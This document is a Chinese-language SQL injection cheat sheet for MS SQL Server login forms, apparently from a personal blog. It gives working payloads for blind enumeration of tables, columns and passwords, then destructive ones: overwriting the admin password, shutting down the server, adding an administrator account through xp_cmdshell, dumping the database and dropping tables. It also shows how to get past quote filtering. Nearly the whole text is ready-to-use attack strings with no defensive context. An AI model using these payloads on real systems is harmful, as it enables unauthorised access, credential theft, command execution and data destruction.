1. 試探是否能夠注入
'
2. 試探管理員用戶名
XXX
3. 猜表名
admin'or 0>(select count(*) from [XXX]) --
更狠的方法直接取表名：
admin' and (Select Top 1 name from sysobjects where xtype='U')>0 --
4. 猜列名
admin'and 0< (select count(XXX) from [Users]) --
再來狠的取列名：
admin' and (Select top 1 col_name(object_id('Users'), 3) from [Users])>0 --
5. 猜密碼長度
admin'and 1=(select count(*) from [Users] where len(Password)<XXX) --
6. 猜密碼
admin'and 1=(select count(*) from [Users] where left(Password,2)='XX') --
----------------------------------------------------------------------------------------------
在探測出了表名和列表的時候，可以使用終極武器，直接修改admin的密碼，或者做更加惡劣的破壞行為：
admin';update [Users] set Password='123' where UserName='admin' --
----------------------------------------------------------------------------------------------
其他惡劣行為：
1. 直接關(guān)閉偶的SQL服務(wù)
admin';shutdown --
2. 如果使用sa用戶并可能遭受的攻擊：在偶機器上添加用戶，并加入某個組織：
admin';exec master..xp_cmdshell "net user name password /add" --
admin';exec master..xp_cmdshell "net localgroup name administrators /add" --
3. 直接備份數(shù)據(jù)庫，然后下載下來，非常惡劣，建議不要對我使用。
admin';backup database Test to disk='d:"1.db'--
4. 直接刪表，慎用啊
admin';drop table abc --
----------------------------------------------------------------------------------------------
其他經(jīng)驗總結(jié)：
1. 繞過單引號過濾
where xtype='U' ===> where xtype=char(85)
where name='用戶' ===> where name=nchar(29992)+nchar(25143)
2. 取數(shù)據(jù)庫名稱
admin' and db_name()>0 --
----------------------------------------------------------------------------------------------